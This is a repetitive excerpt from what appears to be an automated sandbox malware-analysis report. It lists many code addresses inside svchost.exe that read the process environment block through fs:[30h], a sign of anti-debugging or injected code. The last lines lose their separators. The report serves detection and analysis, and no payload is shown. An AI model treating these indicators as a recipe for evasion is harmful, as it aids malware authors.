Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038325E0 mov eax, dword ptr fs:[00000030h] | 3_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C5ED mov eax, dword ptr fs:[00000030h] | 3_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C5ED mov eax, dword ptr fs:[00000030h] | 3_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038C6500 mov eax, dword ptr fs:[00000030h] | 3_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904500 mov eax, dword ptr fs:[00000030h] | 3_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904500 mov eax, dword ptr fs:[00000030h] | 3_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904500 mov eax, dword ptr fs:[00000030h] | 3_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904500 mov eax, dword ptr fs:[00000030h] | 3_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904500 mov eax, dword ptr fs:[00000030h] | 3_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904500 mov eax, dword ptr fs:[00000030h] | 3_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904500 mov eax, dword ptr fs:[00000030h] | 3_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840535 mov eax, dword ptr fs:[00000030h] | 3_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840535 mov eax, dword ptr fs:[00000030h] | 3_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840535 mov eax, dword ptr fs:[00000030h] | 3_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840535 mov eax, dword ptr fs:[00000030h] | 3_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840535 mov eax, dword ptr fs:[00000030h] | 3_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840535 mov eax, dword ptr fs:[00000030h] | 3_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h] | 3_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h] | 3_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h] | 3_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h] | 3_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E53E mov eax, dword ptr fs:[00000030h] | 3_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838550 mov eax, dword ptr fs:[00000030h] | 3_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838550 mov eax, dword ptr fs:[00000030h] | 3_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386656A mov eax, dword ptr fs:[00000030h] | 3_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386656A mov eax, dword ptr fs:[00000030h] | 3_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386656A mov eax, dword ptr fs:[00000030h] | 3_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038EA49A mov eax, dword ptr fs:[00000030h] | 3_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038364AB mov eax, dword ptr fs:[00000030h] | 3_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038644B0 mov ecx, dword ptr fs:[00000030h] | 3_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BA4B0 mov eax, dword ptr fs:[00000030h] | 3_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038304E5 mov ecx, dword ptr fs:[00000030h] | 3_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868402 mov eax, dword ptr fs:[00000030h] | 3_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868402 mov eax, dword ptr fs:[00000030h] | 3_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868402 mov eax, dword ptr fs:[00000030h] | 3_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h] | 3_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h] | 3_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E420 mov eax, dword ptr fs:[00000030h] | 3_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382C427 mov eax, dword ptr fs:[00000030h] | 3_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h] | 3_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h] | 3_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h] | 3_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h] | 3_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h] | 3_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h] | 3_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6420 mov eax, dword ptr fs:[00000030h] | 3_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A430 mov eax, dword ptr fs:[00000030h] | 3_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E443 mov eax, dword ptr fs:[00000030h] | 3_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038EA456 mov eax, dword ptr fs:[00000030h] | 3_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382645D mov eax, dword ptr fs:[00000030h] | 3_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385245A mov eax, dword ptr fs:[00000030h] | 3_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BC460 mov ecx, dword ptr fs:[00000030h] | 3_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h] | 3_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h] | 3_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385A470 mov eax, dword ptr fs:[00000030h] | 3_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840BBE mov eax, dword ptr fs:[00000030h] | 3_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840BBE mov eax, dword ptr fs:[00000030h] | 3_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E4BB0 mov eax, dword ptr fs:[00000030h] | 3_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E4BB0 mov eax, dword ptr fs:[00000030h] | 3_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h] | 3_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h] | 3_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03850BCB mov eax, dword ptr fs:[00000030h] | 3_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h] | 3_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h] | 3_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830BCD mov eax, dword ptr fs:[00000030h] | 3_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038DEBD0 mov eax, dword ptr fs:[00000030h] | 3_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h] | 3_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h] | 3_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838BF0 mov eax, dword ptr fs:[00000030h] | 3_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385EBFC mov eax, dword ptr fs:[00000030h] | 3_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BCBF0 mov eax, dword ptr fs:[00000030h] | 3_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AEB1D mov eax, dword ptr fs:[00000030h] | 3_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385EB20 mov eax, dword ptr fs:[00000030h] | 3_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385EB20 mov eax, dword ptr fs:[00000030h] | 3_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F8B28 mov eax, dword ptr fs:[00000030h] | 3_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F8B28 mov eax, dword ptr fs:[00000030h] | 3_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E4B4B mov eax, dword ptr fs:[00000030h] | 3_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E4B4B mov eax, dword ptr fs:[00000030h] | 3_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038C6B40 mov eax, dword ptr fs:[00000030h] | 3_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038C6B40 mov eax, dword ptr fs:[00000030h] | 3_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D8B42 mov eax, dword ptr fs:[00000030h] | 3_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FAB40 mov eax, dword ptr fs:[00000030h] | 3_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038DEB50 mov eax, dword ptr fs:[00000030h] | 3_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382CB7E mov eax, dword ptr fs:[00000030h] | 3_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383EA80 mov eax, dword ptr fs:[00000030h] | 3_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904A80 mov eax, dword ptr fs:[00000030h] | 3_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868A90 mov edx, dword ptr fs:[00000030h] | 3_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838AA0 mov eax, dword ptr fs:[00000030h] | 3_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838AA0 mov eax, dword ptr fs:[00000030h] | 3_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03886AA4 mov eax, dword ptr fs:[00000030h] | 3_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h] | 3_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h] | 3_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03886ACC mov eax, dword ptr fs:[00000030h] | 3_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830AD0 mov eax, dword ptr fs:[00000030h] | 3_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03864AD0 mov eax, dword ptr fs:[00000030h] | 3_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03864AD0 mov eax, dword ptr fs:[00000030h] | 3_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386AAEE mov eax, dword ptr fs:[00000030h] | 3_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386AAEE mov eax, dword ptr fs:[00000030h] | 3_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BCA11 mov eax, dword ptr fs:[00000030h] | 3_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386CA24 mov eax, dword ptr fs:[00000030h] | 3_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385EA2E mov eax, dword ptr fs:[00000030h] | 3_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03854A35 mov eax, dword ptr fs:[00000030h] | 3_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03854A35 mov eax, dword ptr fs:[00000030h] | 3_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386CA38 mov eax, dword ptr fs:[00000030h] | 3_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h] | 3_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h] | 3_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h] | 3_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h] | 3_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h] | 3_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h] | 3_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836A50 mov eax, dword ptr fs:[00000030h] | 3_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840A5B mov eax, dword ptr fs:[00000030h] | 3_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840A5B mov eax, dword ptr fs:[00000030h] | 3_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h] | 3_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h] | 3_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386CA6F mov eax, dword ptr fs:[00000030h] | 3_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038DEA60 mov eax, dword ptr fs:[00000030h] | 3_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038ACA72 mov eax, dword ptr fs:[00000030h] | 3_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038ACA72 mov eax, dword ptr fs:[00000030h] | 3_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038429A0 mov eax, dword ptr fs:[00000030h] | 3_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038309AD mov eax, dword ptr fs:[00000030h] | 3_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038309AD mov eax, dword ptr fs:[00000030h] | 3_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B89B3 mov esi, dword ptr fs:[00000030h] | 3_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B89B3 mov eax, dword ptr fs:[00000030h] | 3_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B89B3 mov eax, dword ptr fs:[00000030h] | 3_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038C69C0 mov eax, dword ptr fs:[00000030h] | 3_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h] | 3_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h] | 3_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h] | 3_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h] | 3_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h] | 3_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A9D0 mov eax, dword ptr fs:[00000030h] | 3_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038649D0 mov eax, dword ptr fs:[00000030h] | 3_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FA9D3 mov eax, dword ptr fs:[00000030h] | 3_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BE9E0 mov eax, dword ptr fs:[00000030h] | 3_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038629F9 mov eax, dword ptr fs:[00000030h] | 3_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038629F9 mov eax, dword ptr fs:[00000030h] | 3_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE908 mov eax, dword ptr fs:[00000030h] | 3_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE908 mov eax, dword ptr fs:[00000030h] | 3_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BC912 mov eax, dword ptr fs:[00000030h] | 3_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03828918 mov eax, dword ptr fs:[00000030h] | 3_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03828918 mov eax, dword ptr fs:[00000030h] | 3_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B892A mov eax, dword ptr fs:[00000030h] | 3_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038C892B mov eax, dword ptr fs:[00000030h] | 3_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B0946 mov eax, dword ptr fs:[00000030h] | 3_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03856962 mov eax, dword ptr fs:[00000030h] | 3_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03856962 mov eax, dword ptr fs:[00000030h] | 3_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03856962 mov eax, dword ptr fs:[00000030h] | 3_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387096E mov eax, dword ptr fs:[00000030h] | 3_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387096E mov edx, dword ptr fs:[00000030h] | 3_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387096E mov eax, dword ptr fs:[00000030h] | 3_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D4978 mov eax, dword ptr fs:[00000030h] | 3_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D4978 mov eax, dword ptr fs:[00000030h] | 3_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BC97C mov eax, dword ptr fs:[00000030h] | 3_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830887 mov eax, dword ptr fs:[00000030h] | 3_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BC89D mov eax, dword ptr fs:[00000030h] | 3_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E8C0 mov eax, dword ptr fs:[00000030h] | 3_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FA8E4 mov eax, dword ptr fs:[00000030h] | 3_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C8F9 mov eax, dword ptr fs:[00000030h] | 3_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C8F9 mov eax, dword ptr fs:[00000030h] | 3_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BC810 mov eax, dword ptr fs:[00000030h] | 3_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03852835 mov eax, dword ptr fs:[00000030h] | 3_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03852835 mov eax, dword ptr fs:[00000030h] | 3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov ecx, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852835 mov eax, dword ptr fs:[00000030h]3_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A830 mov eax, dword ptr fs:[00000030h]3_2_0386A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D483A mov eax, dword ptr fs:[00000030h]3_2_038D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D483A mov eax, dword ptr fs:[00000030h]3_2_038D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03842840 mov ecx, dword ptr fs:[00000030h]3_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860854 mov eax, dword ptr fs:[00000030h]3_2_03860854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834859 mov eax, dword ptr fs:[00000030h]3_2_03834859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834859 mov eax, dword ptr fs:[00000030h]3_2_03834859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE872 mov eax, dword ptr fs:[00000030h]3_2_038BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE872 mov eax, dword ptr fs:[00000030h]3_2_038BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6870 mov eax, dword ptr fs:[00000030h]3_2_038C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6870 mov eax, dword ptr fs:[00000030h]3_2_038C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386CF80 mov eax, dword ptr fs:[00000030h]3_2_0386CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03862F98 mov eax, dword ptr fs:[00000030h]3_2_03862F98
